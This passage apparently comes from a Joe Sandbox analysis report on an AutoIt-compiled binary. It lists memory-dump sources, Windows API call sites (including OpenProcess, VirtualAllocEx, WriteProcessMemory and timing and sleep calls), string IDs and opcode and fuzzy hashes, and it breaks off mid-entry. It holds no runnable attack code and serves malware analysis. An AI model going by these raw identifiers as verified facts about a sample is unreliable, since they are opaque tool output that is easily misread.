                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: From$Prog$FreeStringTasklstrcmpi
                            • String ID:
                            • API String ID: 3897988419-0
                            • Opcode ID: cb91c7b00c26c5e10636ede166580efb3f5f319f405f6ecfbef587e70e4d15c6
                            • Instruction ID: 5eb331f7d3b53411696faca72adc74b760c8b38987ff9759bdd2fecb8c638465
                            • Opcode Fuzzy Hash: cb91c7b00c26c5e10636ede166580efb3f5f319f405f6ecfbef587e70e4d15c6
                            • Instruction Fuzzy Hash: 7801DFBA600208BBCB105F64DC44BAABBBCEF45791F100075FD04D6320DB36DD818BA4
                            APIs
                            • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00425260
                            • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 0042526E
                            • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00425276
                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00425280
                            • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 004252BC
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: PerformanceQuery$CounterSleep$Frequency
                            • String ID:
                            • API String ID: 2833360925-0
                            • Opcode ID: 138dc0c63edb8f7385c2d0b5146884b1e89d544f30cf8a2981db9004cfc99f2e
                            • Instruction ID: d258f19f819e86861d1d93c4797836a78502ebc45fd832c9ad356daad64eeb0a
                            • Opcode Fuzzy Hash: 138dc0c63edb8f7385c2d0b5146884b1e89d544f30cf8a2981db9004cfc99f2e
                            • Instruction Fuzzy Hash: DA012135E01A2DDBCF00DFE4ED496EDBB78FF0A711F8101A6D541B2280CB7459548BA9
                            APIs
                            • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00418121
                            • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0041812B
                            • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0041813A
                            • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00418141
                            • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00418157
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: HeapInformationToken$AllocErrorLastProcess
                            • String ID:
                            • API String ID: 44706859-0
                            • Opcode ID: aef73fbac0bfff11a1b1576570bc963bb5a023924518a0e10ac38801231d79f5
                            • Instruction ID: 17d0f9705bff3a2c671f0b70dac8350dafbb7c3480b479545d6ffe4e36dc83d7
                            • Opcode Fuzzy Hash: aef73fbac0bfff11a1b1576570bc963bb5a023924518a0e10ac38801231d79f5
                            • Instruction Fuzzy Hash: 45F06275240304BFEB210FA5ECC8EA73BADFF8A754B10003AF945D6250CBA59D45DA64
                            APIs
                            • GetDlgItem.USER32(?,000003E9), ref: 0041C1F7
                            • GetWindowTextW.USER32(00000000,?,00000100), ref: 0041C20E
                            • MessageBeep.USER32(00000000), ref: 0041C226
                            • KillTimer.USER32 ref: 0041C242
                            • EndDialog.USER32 ref: 0041C25C
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: BeepDialogItemKillMessageTextTimerWindow
                            • String ID:
                            • API String ID: 3741023627-0
                            • Opcode ID: cf637620ff695445ffc68bc20458ac23fd8054a4c7dd54cffe2a37aa23dc12ea
                            • Instruction ID: 098b2a1e705143d12f280c90b4053b9b8f6e1078a3117ce504adb6e6092dc07e
                            • Opcode Fuzzy Hash: cf637620ff695445ffc68bc20458ac23fd8054a4c7dd54cffe2a37aa23dc12ea
                            • Instruction Fuzzy Hash: 1701DB348443049BEB205B54DD8EFD67778FF01706F0006BAF942914E0D7F46989CB54
                            APIs
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: Path$ObjectStroke$DeleteFillSelect
                            • String ID:
                            • API String ID: 2625713937-0
                            • Opcode ID: e8c09d81d8934c37269751090568ddaae023a1b3542c1d967aaaf13aa935fa0a
                            • Instruction ID: dc18df35b83f5ccd9290cecf5b4c90bc275d05c6fb2f8cedcee4a4c013a23826
                            • Opcode Fuzzy Hash: e8c09d81d8934c37269751090568ddaae023a1b3542c1d967aaaf13aa935fa0a
                            • Instruction Fuzzy Hash: 58F0CD34004648DBDB266F56EC4CB5C3FE4AB42326F188A39E429894F2D73149A5DF58
                            APIs
                              • Part of subcall function 003E0DB6: std::exception::exception.LIBCMT ref: 003E0DEC
                              • Part of subcall function 003E0DB6: __CxxThrowException@8.LIBCMT ref: 003E0E01
                              • Part of subcall function 003C7DE1: _memmove.LIBCMT ref: 003C7E22
                              • Part of subcall function 003C7A51: _memmove.LIBCMT ref: 003C7AAB
                            • __swprintf.LIBCMT ref: 003D2ECD
                            Strings
                            • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 003D2D66
                            Similarity
                            • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                            • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                            • API String ID: 1943609520-557222456
                            APIs
                              • Part of subcall function 003C4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,003C4743,?,?,003C37AE,?), ref: 003C4770
                            • CoInitialize.OLE32(00000000), ref: 0042B9BB
                            • CoCreateInstance.OLE32(00452D6C,00000000,00000001,00452BDC,?), ref: 0042B9D4
                            • CoUninitialize.OLE32 ref: 0042B9F1
                              • Part of subcall function 003C9837: __itow.LIBCMT ref: 003C9862
                              • Part of subcall function 003C9837: __swprintf.LIBCMT ref: 003C98AC
                            Strings
                            Similarity
                            • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                            • String ID: .lnk
                            • API String ID: 2126378814-24824748
                            APIs
                            • OleSetContainedObject.OLE32(?,00000001), ref: 0041B4BE
                            Strings
                            Similarity
                            • API ID: ContainedObject
                            • String ID: AutoIt3GUI$Container$%E
                            • API String ID: 3565006973-4107763017
                            APIs
                            • __startOneArgErrorHandling.LIBCMT ref: 003E50AD
                              • Part of subcall function 003F00F0: __87except.LIBCMT ref: 003F012B
                            Strings
                            Similarity
                            • API ID: ErrorHandling__87except__start
                            • String ID: pow
                            • API String ID: 2905807303-2276729525
                            APIs
                            Strings
                            Similarity
                            • API ID: _memmove
                            • String ID: 3c=$_=
                            • API String ID: 4104443479-3170935384
                            APIs
                              • Part of subcall function 004214BC: WriteProcessMemory.KERNEL32 ref: 004214E6
                            • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 0041983F
                              • Part of subcall function 00421487: ReadProcessMemory.KERNEL32 ref: 004214B1
                              • Part of subcall function 004213DE: GetWindowThreadProcessId.USER32(?,?), ref: 00421409
                              • Part of subcall function 004213DE: OpenProcess.KERNEL32(00000438,00000000,?,?,?,0041925A,00000034,?,?,00001004,00000000,00000000), ref: 00421419
                              • Part of subcall function 004213DE: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,0041925A,00000034,?,?,00001004,00000000,00000000), ref: 0042142F
                            • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 004198AC
                            • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 004198F9
                            Strings
                            Similarity
                            • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                            • String ID: @
                            • API String ID: 4150878124-2766056989
                            APIs
                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004479DF
                            • GetWindowLongW.USER32 ref: 004479FC
                            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00447A0C
                            Strings
                            Similarity
                            • API ID: Window$Long
                            • String ID: SysTreeView32
                            • API String ID: 847901565-1698111956
                            APIs
                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 00447B61
                            • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00447B76
                            Strings
                            Similarity
                            • API ID: MessageSend
                            • String ID: '$`$
                            • API String ID: 3850602802-3373939379
                            APIs
                            • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00447461
                            • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00447475
                            • SendMessageW.USER32(?,00001002,00000000,?), ref: 00447499
                            Strings
                            Similarity
                            • API ID: MessageSend$Window
                            • String ID: SysMonthCal32
                            • API String ID: 2326795674-1439706946
                            APIs
                            • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00446D3B
                            • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00446D4B
                            • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00446D70
                            Strings
                            Similarity
                            • API ID: MessageSend$MoveWindow
                            • String ID: Listbox
                            • API String ID: 3315199576-2633736733
                            APIs
                            • __snwprintf.LIBCMT ref: 00433A66
                              • Part of subcall function 003C7DE1: _memmove.LIBCMT ref: 003C7E22
                            Strings
                            Similarity
                            • API ID: __snwprintf_memmove
                            • String ID: , $$AUTOITCALLVARIABLE%d$%E
                            • API String ID: 3506404897-3592505783
                            APIs
                            • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00447772
                            • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00447787
                            • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00447794
                            Strings
                            Similarity
                            • API ID: MessageSend
                            • String ID: msctls_trackbar32
                            • API String ID: 3850602802-1010561917
                            APIs
                            Strings
                            Similarity
                            • API ID: __calloc_crt
                            • String ID: G$@BH
                            • API String ID: 3494438863-1093684215
                            APIs
                            • GetForegroundWindow.USER32 ref: 0044ACD1
                            • GetFocus.USER32(?,00000000,00000000,?,?,?,003FB969,?,?,?,?,?), ref: 0044ACD9
                              • Part of subcall function 003C2612: GetWindowLongW.USER32(?,000000EB), ref: 003C2623
                              • Part of subcall function 003C25DB: GetWindowLongW.USER32(?,000000EB), ref: 003C25EC
                            • SendMessageW.USER32(00E35190,000000B0,000001BC,000001C0), ref: 0044AD4B
                            Strings
                            Similarity
                            • API ID: Window$Long$FocusForegroundMessageSend
                            • String ID: `$
                            • API String ID: 3601265619-74666722
                            APIs
                            • __lock.LIBCMT ref: 003E9B94
                              • Part of subcall function 003E9C0B: __mtinitlocknum.LIBCMT ref: 003E9C1D
                              • Part of subcall function 003E9C0B: EnterCriticalSection.KERNEL32(00000000,?,003E9A7C,0000000D), ref: 003E9C36
                            • __updatetlocinfoEx_nolock.LIBCMT ref: 003E9BA4
                              • Part of subcall function 003E9100: ___addlocaleref.LIBCMT ref: 003E911C
                              • Part of subcall function 003E9100: ___removelocaleref.LIBCMT ref: 003E9127
                              • Part of subcall function 003E9100: ___freetlocinfo.LIBCMT ref: 003E913B
                            Strings
                            Similarity
                            • API ID: CriticalEnterEx_nolockSection___addlocaleref___freetlocinfo___removelocaleref__lock__mtinitlocknum__updatetlocinfo
                            • String ID: 8G$8G
                            • API String ID: 547918592-2430898790
                            APIs
                            • LoadLibraryA.KERNEL32(kernel32.dll), ref: 003C4C44
                            • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 003C4C56
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: AddressLibraryLoadProc
                            • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                            • API String ID: 2574300362-1355242751
                            • Opcode ID: 6ee9c9293318e3279478365396d5852bf098b0a4d5c64fbd1a5282d95fe2360e
                            • Instruction ID: 6573de9e970c409421c762c50650efffd0ed2a60283600081bd076a6463218c9
                            • Opcode Fuzzy Hash: 6ee9c9293318e3279478365396d5852bf098b0a4d5c64fbd1a5282d95fe2360e
                            • Instruction Fuzzy Hash: 77D01774910723EFD720AF31D918B4A76E4AF06391B22C83E9496DA578E6B4DC84CB54
                            APIs
                            • LoadLibraryA.KERNEL32(kernel32.dll), ref: 003C4C11
                            • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection,?,004852F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 003C4C23
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: AddressLibraryLoadProc
                            • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                            • API String ID: 2574300362-3689287502
                            • Opcode ID: 316ad1407ba6a332162f02d950c965ac423ce5ee882b16bbe3ee9a72ef4980d0
                            • Instruction ID: 222ad39dc1cf57403219deb6871834b0195198d6f56d168aaa42a3ecebad1b04
                            • Opcode Fuzzy Hash: 316ad1407ba6a332162f02d950c965ac423ce5ee882b16bbe3ee9a72ef4980d0
                            • Instruction Fuzzy Hash: 47D08C70500712DFD7205F70D908B06B6D5EF0A342B11C83E9485C6160E6B4E880C714
                            APIs
                            • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00440DF5
                            • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00440E07
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: AddressLibraryLoadProc
                            • String ID: RegDeleteKeyExW$advapi32.dll
                            • API String ID: 2574300362-4033151799
                            • Opcode ID: cb6e6b1bd61b6ea7dfc2b15d044bb1c156e2c7f07ff6516d1c4fbce018574beb
                            • Instruction ID: 527d594ceb6efab560b197cbe4f687d77e305661566da0a44bd49fd0ef76c2b7
                            • Opcode Fuzzy Hash: cb6e6b1bd61b6ea7dfc2b15d044bb1c156e2c7f07ff6516d1c4fbce018574beb
                            • Instruction Fuzzy Hash: 4AD0E275910722DFE7209B75C80868776E5AF05352F21CC3E958AD6650E6B8D8A0CA58
                            APIs
                            • LoadLibraryA.KERNEL32(kernel32.dll), ref: 004390EE
                            • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW,?,0044F910), ref: 00439100
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: AddressLibraryLoadProc
                            • String ID: GetModuleHandleExW$kernel32.dll
                            • API String ID: 2574300362-199464113
                            • Opcode ID: d3b74d341e2661cf3990cc04b921a30f7aa0a0408fc3ac0d73574c6f2b54bddb
                            • Instruction ID: 4bcf639d9971f3b8989f5084a7fa3fd957c5c9952c44e1aefa379acdd8ba7c77
                            • Opcode Fuzzy Hash: d3b74d341e2661cf3990cc04b921a30f7aa0a0408fc3ac0d73574c6f2b54bddb
                            • Instruction Fuzzy Hash: FFD01274550723DFEB209F31D81C64776D4AF06351F11C83FD485D6650E6B8DC84C654
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: LocalTime__swprintf
                            • String ID: %.3d$WIN_XPe
                            • API String ID: 2070861257-2409531811
                            • Opcode ID: 7ff6a9e44e5c4948280db34a74f53d8d3eeab63ed5b84f8cfbfcfe5e267a2b5f
                            • Instruction ID: b8122e9274b6d4c056e9b755b414b74f19333e3f557c0b2e1045f1e2b1216885
                            • Opcode Fuzzy Hash: 7ff6a9e44e5c4948280db34a74f53d8d3eeab63ed5b84f8cfbfcfe5e267a2b5f
                            • Instruction Fuzzy Hash: 7BD01271844118FBC70197909888DF9737CA709311F541573F406F30D0E2399B55D62A
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 48668033fe87e0c3a018ffada3cba4766717c1723e1ea657dcc78c32eae746c2
                            • Instruction ID: c03e39c61cc8f6cb111f8968e603d44bb8a0e6f815384ab8fabcc343413a06c7
                            • Opcode Fuzzy Hash: 48668033fe87e0c3a018ffada3cba4766717c1723e1ea657dcc78c32eae746c2
                            • Instruction Fuzzy Hash: 4BC16C74A0421AEFCB14CFA4C884EAEBBB5FF48714B14859AE805EB351D734ED81DB94
                            APIs
                            • CharLowerBuffW.USER32(?,?), ref: 0043E0BE
                            • CharLowerBuffW.USER32(?,?), ref: 0043E101
                              • Part of subcall function 0043D7A5: CharLowerBuffW.USER32(?,?), ref: 0043D7C5
                            • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 0043E301
                            • _memmove.LIBCMT ref: 0043E314
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: BuffCharLower$AllocVirtual_memmove
                            • String ID:
                            • API String ID: 3659485706-0
                            • Opcode ID: 2e4dbf7b4070cfb2c2437c4275dfd1d17840d325595e80aa45ce1f10b1af6275
                            • Instruction ID: 7b3c2090e0984fb5949d20e1eb5eb51a0c7f1fc305dd61af8e5253d78fa908bd
                            • Opcode Fuzzy Hash: 2e4dbf7b4070cfb2c2437c4275dfd1d17840d325595e80aa45ce1f10b1af6275
                            • Instruction Fuzzy Hash: 86C15371A083018FC705DF29C480A6ABBE4FF89714F14896EF899DB391D734E946CB86
                            APIs
                            • CoInitialize.OLE32(00000000), ref: 004380C3
                            • CoUninitialize.OLE32 ref: 004380CE
                              • Part of subcall function 0041D56C: CoCreateInstance.OLE32(?,00000000,00000005,?,?), ref: 0041D5D4
                            • VariantInit.OLEAUT32(?), ref: 004380D9
                            • VariantClear.OLEAUT32(?), ref: 004383AA
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                            • String ID:
                            • API String ID: 780911581-0
                            • Opcode ID: 12232065eb3b8d406d80f08f4e0764099374f9d6d0e42b8d34e0898af68887c9
                            • Instruction ID: 76ea3519c6bd98f976cad16abadd5d0190b630aefa54a601b8fcd81aa9ba3d01
                            • Opcode Fuzzy Hash: 12232065eb3b8d406d80f08f4e0764099374f9d6d0e42b8d34e0898af68887c9
                            • Instruction Fuzzy Hash: 38A132756047019FCB00DF25C885B2AB7E4BF89764F05445EF99A9B3A1CB38ED05CB8A
                            APIs
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: Variant$AllocClearCopyInitString
                            • String ID:
                            • API String ID: 2808897238-0
                            • Opcode ID: 844909aeeec2b79684a51329365b59b344c63a88b4ac652bd26ba42ffef39588
                            • Instruction ID: 45e7adfe4cbb3b12d15c3e45611c2a7741ffb3bea392ac15c4d3c191f6bb7a2b
                            • Opcode Fuzzy Hash: 844909aeeec2b79684a51329365b59b344c63a88b4ac652bd26ba42ffef39588
                            • Instruction Fuzzy Hash: C651F4747003029BCB24AF65D891BBAB7E5AF46350F21C81FE58ADB291DB78DCC18709
                            APIs
                            • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00419AD2
                            • __itow.LIBCMT ref: 00419B03
                              • Part of subcall function 00419D53: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00419DBE
                            • SendMessageW.USER32(?,0000110A,00000001,?), ref: 00419B6C
                            • __itow.LIBCMT ref: 00419BC3
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: MessageSend$__itow
                            • String ID:
                            • API String ID: 3379773720-0
                            • Opcode ID: f6a04c4e0e2c372a5c9dce31c7d3d89f69dcf483999bd3a52b2811eff73441be
                            • Instruction ID: b3b0c12bb978f83b18c45fd2fe1c06624e277e81d0c9871dfa5089bde917452f
